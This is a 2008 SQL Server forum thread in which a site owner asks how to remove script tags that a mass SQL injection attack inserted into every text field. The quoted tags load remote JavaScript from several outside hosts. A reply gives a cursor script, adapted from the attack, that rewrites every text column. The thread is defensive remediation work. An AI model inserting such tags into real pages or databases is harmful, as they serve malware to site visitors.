| Author |
Topic |
|
ethoemmes
Starting Member
3 Posts |
 Posted - 2008-07-03 : 18:05:03
|
Hi,My site (and associated SQL Server DB) has been hacked. The ****** seem to have got into my DB and inserted the following at the end of every text field.quote:
<script src=http://www.upcomd.com/ngg.js></script><script src=http://www.upcomd.com/ngg.js></script><script src=http://www.testwvr.com/ngg.js></script>
I'm not very experienced with SQL Server and was wondering if someone could help me write a function to go through every table and field and strip out the bit of javascript above?Will this be possible? Do I need to give any other details?Many thanks for lookingE |
|
|
jezemine
Master Smack Fu Yak Hacker
2886 Posts |
Posted - 2008-07-03 : 18:13:17
|
have a look at the REPLACE function in BOL.
elsasoft.org |
 |
|
|
ethoemmes
Starting Member
3 Posts |
Posted - 2008-07-03 : 18:16:39
|
| Excuse my ignorance but what is BOL?Thanks for your quick reply - I'm just checking out the replace function now.E |
|
|
|
jezemine
Master Smack Fu Yak Hacker
2886 Posts |
|
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2008-07-04 : 00:32:30
|
And to avoid this in the future, replace all ad-hoc questions with parametrized queries.
E 12°55'05.25"N 56°04'39.16" |
|
|
|
GilaMonster
Master Smack Fu Yak Hacker
4507 Posts |
Posted - 2008-07-04 : 02:45:05
|
| And lock down the databse security so that the web site doesn't have rights to go and update random tables. I would suggest using only stored procedures for data access and modification and ensuring that the web user has only execute rights on the procs and nothing else.--Gail ShawSQL Server MVP |
|
|
|
ddcohen
Starting Member
2 Posts |
Posted - 2008-07-07 : 07:00:01
|
| I just finished cleaning this up on my site. I found the following page very useful:http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspxI modified the attack script, as found on that page, and used it to clean up the damage:---------------------------------DECLARE @T VARCHAR(255)DECLARE @C VARCHAR(255)DECLARE Table_Cursor CURSOR FORSELECT [A].[Name], [B].[Name]FROM sysobjects AS [A], syscolumns AS [B]WHERE [A].[ID] = [B].[ID] AND[A].[XType] = 'U' /* Table (User-Defined) */ AND([B].[XType] = 99 /* NTEXT */ OR[B].[XType] = 35 /* TEXT */ OR[B].[XType] = 231 /* SYSNAME */ OR[B].[XType] = 167 /* VARCHAR */)OPEN Table_CursorFETCH NEXT FROM Table_Cursor INTO @T,@C WHILE (@@FETCH_STATUS = 0)BEGINEXEC('UPDATE [' + @T + '] SET [' + @C + '] = REPLACE([' + @C + '], ''<script src=http://www.lokriet.com/ngg.js></script>'', '''')')FETCH NEXT FROM Table_Cursor INTO @T, @CENDCLOSE Table_CursorDEALLOCATE Table_Cursor --------------------------------------------Obviously, you have to replace "http://www.lokriet.com/ngg.js" with whatever URL for the malicious script was put into your database. |
|
|
|
ethoemmes
Starting Member
3 Posts |
Posted - 2008-07-07 : 13:34:17
|
Thanks ddcohen - much appreciated.I've just noticed that the SQL injections all use different URLs so the simple find and replace doesn't clear all entries.Can anyone help me use a wildcard in the following line to search for all <script src= ????????? </script>quote:
EXEC('UPDATE [' + @T + '] SET [' + @C + '] = REPLACE([' + @C + '], ''<script src=http://www.lokriet.com/ngg.js></script>'', '''')')
Many thanks for everyones help on this - I'm slowly learning SQL and it a great help to see how everyone else does things.E |
|
|
|
ddcohen
Starting Member
2 Posts |
Posted - 2008-07-07 : 14:21:44
|
| One follow-up note:As I discovered after my initial post, the "replace" statement will not work on any nText columns. For those, you have to cast to nVarchar (available from SQL Server 2005), do the "replace," and then cast back to nText. |
|
|
|
|
Help! My sites been hacked - need custom function